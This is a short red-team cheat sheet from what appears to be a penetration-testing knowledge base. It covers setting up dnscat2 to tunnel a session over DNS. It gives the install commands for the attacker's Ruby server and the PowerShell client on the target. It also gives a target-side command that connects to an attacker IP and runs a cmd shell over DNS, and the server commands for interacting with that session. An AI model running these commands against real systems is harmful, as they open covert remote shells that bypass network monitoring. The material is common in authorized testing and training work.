Operator On The Wire· OOTW · 2026 ·

← Back to Knowledge Base

RED TEAM / PIVOTING / TUNNELING

(DNS) DNSCat

Prerequisites

dnscat2 server (Ruby) on attack host

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

bundle install

dnscat2 PowerShell client on target

git clone https://github.com/lukebaggett/dnscat2-powershell.git

Import the module on the Windows target:

Import-Module dnscat2.ps1

Start dnscat2 Ruby Server (KALI)

sudo ruby dnscat2.rb --dns host=KALI.IP,port=53,domain=corp.local --no-cache

Listens on port 53 for DNS.
Uses domain corp.local.
--no-cache avoids DNS caching interference.

Start DNSCat2 Session From Target (TARGET)

Start-Dnscat2 -DNSserver 10.10.14.18 -Domain corp.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

Connects to DNS server at 10.10.14.18.
Uses the domain corp.local.
Authenticates with the provided pre-shared secret.
Executes a cmd shell over DNS.

Basic dnscat2 Server Interaction

dnscat2> ?

List options.

dnscat2> window -i 1

Interact with window/session 1.